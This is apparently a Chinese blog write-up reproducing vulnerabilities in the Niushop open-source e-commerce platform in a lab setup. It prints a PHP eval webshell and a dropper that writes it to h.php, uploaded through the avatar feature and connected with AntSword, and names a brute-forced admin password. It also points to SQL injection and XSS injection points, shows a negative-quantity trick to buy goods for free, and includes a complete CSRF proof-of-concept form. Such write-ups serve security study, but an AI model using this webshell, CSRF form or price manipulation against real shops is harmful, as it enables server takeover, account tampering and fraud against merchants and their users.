Niushop开源商城(漏洞复现)

文件上传漏洞

注册一个账号后登录

在个人中心修改个人头像

选择我们的图片马

复制代码
#一句话(不想麻烦的选择一句话也可以)
<?php @eval($_POST["cmd"]);?>
#生成h.php文件
<?php 
fputs(fopen('h.php','w'),'<?php @eval($_POST["cmd"]);?>'); 
?>

在BP中进行抓包,改为1.php

右键图片在网页新建打开图片标签;就能获取路径

去蚁剑连接生成的.php就行

弱口令

使用BP抓包

在用户名和密码位添加payload

payload设置;选择我们的字典

开始攻击

得出用户名密码

复制代码
#用户名
admin
#密码
admin1

成功登录

SQL注入漏洞

基于布尔时间盲注

第一个存在点

使用sqlmap跑一下

第二个存在点

二次外带注入

XSS漏洞

存储型

1.后台-->设置-->基础设置-->商城第三方统计代码

来到首页就会弹窗

2.后台-->网站--->广告位

反射型

1.后台--微信--消息管理素材管理-->添加消息存储-->标题

0元购

在商品页面抓包

通过改变数量改变价格

在放行一次修改数量为-1

后面全部放行就OK了

CSRF漏洞

下载源码;制作修改用户信息链接

修改用户信息

BP抓包;制作SCRF

复制下来制作链接

<html>

<!-- CSRF PoC - generated by Burp Suite Professional -->

<body>

<form action="http://172.16.1.195/niushop/index.php?s=/member/person" method="POST" enctype="multipart/form-data">

<input type="hidden" name="user&#95;name" value="bbbcdff" />

<input type="hidden" name="real&#95;name" value="11wsdasa" />

<input type="hidden" name="birthday" value="1970&#45;01&#45;01" />

<input type="hidden" name="location" value="'onclick&#61;'alert&#40;1&#41;'" />

<input type="hidden" name="user&#95;qq" value="2461" />

<input type="hidden" name="act" value="act&#95;edit&#95;profile" />

<input type="hidden" name="submit" value="ç&#161;&#174;è&#174;&#164;ä&#191;&#174;æ&#148;&#185;å&#159;ºæ&#156;&#172;ä&#191;&#161;æ&#129;&#175;" />

<input type="submit" value="Submit request" />

</form>

<script>

history.pushState('', '', '/');

document.forms0.submit();

</script>

</body>

</html>

用户在已登录的状态点击我们的链接

相关推荐
ApacheSeaTunnel19 小时前
当多表数据涌入,Apache SeaTunnel 如何巧妙化解主键冲突?
大数据·开源·数据集成·seatunnel·技术分享·数据同步
稀土熊猫君19 小时前
一个人能做出什么开源项目?
vue.js·后端·开源
杉氧20 小时前
副作用 (Side Effects) 全攻略:如何像大师一样掌控 Composable 的生命周期?
android·架构·android jetpack
狂师1 天前
比 Playwright 更给力,推荐一个AI Agent的浏览器自动化开源项目!
前端·开源·测试
Kapaseker1 天前
Kotlin Toolchain 0.11 发布:主要是把 Amper 干没了
android·kotlin
AI袋鼠帝1 天前
开源「仓颉.Skill」2.0,你现在可以蒸馏任何视频!
开源·aigc
三少爷的鞋1 天前
Android 现代架构不需要事件总线进阶篇
android
冬奇Lab2 天前
每日一个开源项目(第146篇):openpilot - 开源自动驾驶辅助系统,曾在 Consumer Reports 评测中超过特斯拉 Autopilot
人工智能·开源·自动驾驶
她的男孩2 天前
后台接口加密别只会 HTTPS,ForgeAdmin 的 RSA + SM4/AES 源码拆解
后端·面试·开源
杉氧2 天前
深入理解 Compose 重组机制:快照系统如何驱动 UI 精准刷新?
android·架构·android jetpack